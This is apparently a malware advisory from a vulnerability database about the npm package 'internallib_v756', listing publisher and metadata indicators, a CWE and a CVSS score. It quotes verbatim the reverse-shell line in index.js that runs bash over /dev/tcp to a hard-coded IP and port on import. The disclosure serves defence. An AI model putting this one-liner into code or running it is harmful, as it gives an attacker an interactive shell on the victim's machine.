VDB
GCVE-110-OSM-2026-10349
GCVE-110-OSM-2026-10349
Advisory PublishedCVSS 5.4/10
The entrypoint index.js contains an unambiguous reverse shell payload: `child.execSync('/bin/bash -c "bash -i >& /dev/tcp/10.0.74.63/4444 0>&1"')`, which opens an interactive bash shell to attacker-controlled IP 10.0.74.63 on port 4444 upon package import. This is a classic reverse shell implant — the attacker model is remote code execution / interactive shell access on victim machines that install this package. The package is confirmed malicious via three independent knownMalware signature matches in the OSS malware database, the publisher account (cavalher1) was created less than 4 hours before publication with no prior packages, and all metadata indicators (no description, no repository, throwaway name pattern 'internallib_v756') are consistent with a burner/dropper package.
Dunno if old mate cavalher1 understands that 10.0.74.63 is not publicly routable, but will let him learn it the dumb way
ENTRY
index.js (main: index.js)
ADDITIONAL FINDINGS
- Malicious Dependency Detected in package.json
- Shell Command Execution in index.js: "require('child_process')"
- Brand New Package
- Very New NPM Publisher Account
PAYLOAD FILES
index.js
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | internallib_v756 | all (affected) | — |
Aliases
Browse GCVE Records
3,530 records in the GCVE database · Updated September 5, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.